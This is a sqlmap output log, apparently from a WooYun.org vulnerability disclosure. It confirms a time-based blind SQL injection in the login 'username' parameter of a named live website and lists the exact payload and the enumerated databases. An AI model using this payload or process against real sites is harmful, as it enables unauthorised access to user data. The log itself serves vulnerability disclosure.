WooYun.org

GET parameter 'username' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] n
sqlmap identified the following injection points with a total of 839 HTTP(s) req
uests:
---
Parameter: username (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=ajaxlogin&jsoncallback=jQuery164003419350739568472_143415654220
6&&imgcode=&username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))kUHN) AND 'tOPb
'='tOPb&password=admin&ckusername=on&_=1434156576209
---
[09:14:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[09:14:35] [INFO] fetching database names
[09:14:35] [INFO] fetching number of databases
[09:14:35] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[09:14:35] [INFO] retrieved:
[09:14:35] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
1
[09:14:58] [INFO] retrieved:
[09:15:09] [INFO] adjusting time delay to 3 seconds due to good response times
information_schema
available databases [1]:
[*] information_schema
[09:22:57] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.paixie.net'
[*] shutting down at 09:22:57